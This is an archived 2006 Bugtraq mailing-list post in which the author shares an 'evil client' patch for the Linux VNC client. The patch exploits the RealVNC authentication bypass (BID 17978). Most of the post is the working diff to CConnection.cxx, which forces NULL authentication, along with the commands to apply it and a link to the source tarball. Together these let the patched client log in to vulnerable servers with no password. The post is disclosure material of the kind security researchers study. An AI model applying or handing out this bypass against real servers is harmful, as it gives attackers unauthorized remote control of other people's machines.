lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 23 Jun 2006 15:33:09 -0000 From: embyte@...lab.it To: bugtraq@...urityfocus.com Subject: Linux VNC evil client patch - BID 17978 Hi all, I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to authenticate to a bugged server with a NULL session, although password authentication is required (RealVNC Remote Authentication Bypass Vulnerability, BID 17978). Here is the patch for file CConnection.cxx $ cat vnc4-4.1.1+X4.3.0-NULL-Auth.patch 184,185c184,185 < // Inform the server of our decision < if (secType != secTypeInvalid) { --- > // Send to server NULL Auth [0x01] > if (secType=0x01) { Apply with $ patch < vnc4-4.1.1+X4.3.0-NULL-Auth.patch File to patch: vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx patching file vnc4-4.1.1+X4.3.0.orig/common/rfb/CConnection.cxx The original tarball is named vnc4_4.1.1+X4.3.0.orig.tar.gz: http://ftp.debian.org/debian/pool/main/v/vnc4/vnc4_4.1.1+X4.3.0.orig.tar.gz Have a nice day embyte
Powered by blists - more mailing lists